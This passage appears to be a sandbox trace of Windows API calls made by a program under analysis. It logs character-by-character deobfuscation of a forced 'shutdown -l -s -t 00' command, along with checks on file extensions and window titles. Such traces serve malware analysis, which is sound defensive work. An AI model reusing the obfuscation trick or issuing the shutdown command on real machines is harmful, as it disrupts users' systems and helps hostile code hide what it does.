This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0180.437] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0180.438] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0180.438] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0180.439] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0180.439] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0180.439] IsWindow (hWnd=0x103bc) returned 1 [0180.439] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0180.439] IsIconic (hWnd=0x103b8) returned 0 [0180.439] GetParent (hWnd=0x103bc) returned 0x103b8 [0180.439] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0180.439] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0180.440] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0180.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.441] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.441] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.441] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.442] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.442] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.443] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.443] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.443] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.444] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.444] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.445] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.445] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.446] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.446] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.447] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.447] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.448] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.448] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.448] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.449] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.449] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.449] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.450] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.450] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.451] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.451] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.452] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.452] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.453] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.453] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.453] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.454] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.454] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.454] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.455] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.455] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.456] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.456] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.456] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.457] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.457] GetForegroundWindow () returned 0x20086 [0180.457] GetLastError () returned 0x0 [0180.457] SysStringLen (param_1=" ") returned 0xff [0180.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.457] SysStringLen (param_1=" ") returned 0xff [0180.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.457] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.458] GetLastError () returned 0x0 [0180.458] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.458] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.458] SysStringLen (param_1="Pr") returned 0x2 [0180.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x116859c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0180.459] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0180.459] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0180.459] GetFocus () returned 0x0 [0180.459] lstrlenA (lpString="Pr") returned 2 [0180.459] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0180.459] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Pr") returned 2 [0180.459] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0180.460] GetFocus () returned 0x0 [0180.460] lstrcmpA (lpString1="Pr", lpString2="Pr") returned 0 [0180.460] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.460] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0180.460] GetFocus () returned 0x0 [0180.460] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0180.460] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0180.460] GetFocus () returned 0x0 [0180.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0180.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0180.461] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.461] VarBstrCmp (bstrLeft="Pr", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.462] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0180.462] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.463] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0180.463] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.464] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.464] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.464] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.465] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.465] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.466] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.466] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.466] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.467] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.467] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.468] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 